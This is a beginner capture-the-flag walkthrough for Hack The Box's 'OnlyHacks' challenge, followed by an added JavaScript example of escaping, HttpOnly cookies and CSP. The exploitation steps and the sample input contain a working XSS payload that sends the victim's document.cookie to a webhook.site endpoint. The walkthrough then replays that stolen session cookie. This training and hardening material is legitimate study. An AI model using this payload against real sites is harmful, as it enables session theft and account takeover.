Explore the basics of cybersecurity in the OnlyHacks Challenge on Hack The Box. This very-easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/860

Description

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Exploitation

Register and log in, then navigate to Matches to start a conversation.

Begin the conversation with:

Hello, how are you?

Set up a webhook by obtaining a unique URL from https://webhook.site/, and use it in place of the placeholder link in the payload.

Demonstrate the XSS by sending this message:

Hello there `<script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>`

Lastly, paste the captured cookie into the designated page and refresh.

Summary

The OnlyHacks Challenge on Hack The Box is a very-easy web challenge that involves Cross-Site Scripting (XSS) to steal session cookies. Participants register on a dating-themed platform, start a conversation, and inject a malicious JavaScript payload that sends the victim’s session cookie to a controlled webhook endpoint. By capturing and using the stolen cookie, they gain unauthorized access, demonstrating the impact of client-side script injection. The challenge highlights the dangers of improper input sanitization and emphasizes the need for secure handling of user-generated content to prevent XSS attacks.
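
The fix side of this finding, as an added example that is not the challenge's own code: the chat message is HTML-encoded at output time, the session cookie is marked HttpOnly so script cannot read it through document.cookie, and a Content-Security-Policy header blocks inline scripts. The function names, the cookie name `session` and the sample token are assumptions made for illustration.

```javascript
// Added example (not from the challenge): safe handling of user-generated chat text.
// All names here (renderMessageSafe, "session", the sample token) are hypothetical.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode the five characters that can change the HTML parsing context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the message is concatenated into markup as-is,
// so any tag it contains is parsed by the recipient's browser.
function renderMessageUnsafe(sender, text) {
  return `<div class="msg"><b>${sender}</b>: ${text}</div>`;
}

// Hardened pattern: every user-controlled value is encoded when it is written out.
function renderMessageSafe(sender, text) {
  return `<div class="msg"><b>${escapeHtml(sender)}</b>: ${escapeHtml(text)}</div>`;
}

// Defence in depth: HttpOnly keeps the cookie out of document.cookie,
// Secure restricts it to HTTPS, SameSite limits cross-site sends.
function sessionCookieHeader(token) {
  return `session=${encodeURIComponent(token)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Defence in depth: without 'unsafe-inline', inline <script> blocks do not execute.
function cspHeader() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// Constructed sample input, same shape as the message in the walkthrough.
const sample =
  "Hello there <script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>";

console.log("unsafe:", renderMessageUnsafe("alice", sample));
console.log("safe:  ", renderMessageSafe("alice", sample));
console.log("Set-Cookie:", sessionCookieHeader("constructed-token-123"));
console.log("Content-Security-Policy:", cspHeader());
```

Encoding at output is the primary control; the cookie flags and CSP limit the damage if an encoding step is missed somewhere.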